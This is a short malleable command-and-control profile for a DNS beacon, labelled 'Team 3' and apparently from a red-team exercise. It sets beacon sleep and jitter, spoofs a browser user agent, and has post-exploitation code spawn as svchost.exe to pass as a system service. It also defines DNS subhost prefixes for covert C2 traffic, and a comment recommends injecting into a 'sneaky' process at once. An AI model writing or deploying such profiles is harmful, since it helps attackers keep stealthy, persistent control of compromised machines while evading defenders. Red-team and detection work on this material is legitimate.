#Team 3 DNS Beacon Malleable c2 Profile
#Be aware that the sleep time is set to allow quing up commands but you will want to inject into a more
#stable/sneaky process almost immediately.

set sleeptime "300";
set jitter    "20";
set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0";

post-ex {
    set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs";
    set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs";
}

dns-beacon {
    # Options moved into 'dns-beacon' group in 4.3:
    set dns_idle             "66.76.76.15";
    set dns_max_txt          "20";
    set dns_sleep            "0";
    set dns_ttl              "1600";
    set maxdns               "255";
    set dns_stager_prepend   ".wwwds.";
    set dns_stager_subhost   ".e2867.dsca.";

    # DNS subhost override options added in 4.3:
    set beacon               "d-bx.";
    set get_A                "d-1ax.";
    set get_AAAA             "d-4ax.";
    set get_TXT              "d-1tx.";
    set put_metadata         "d-1mx";
    set put_output           "d-1ox.";
    set ns_response          "zero";
}

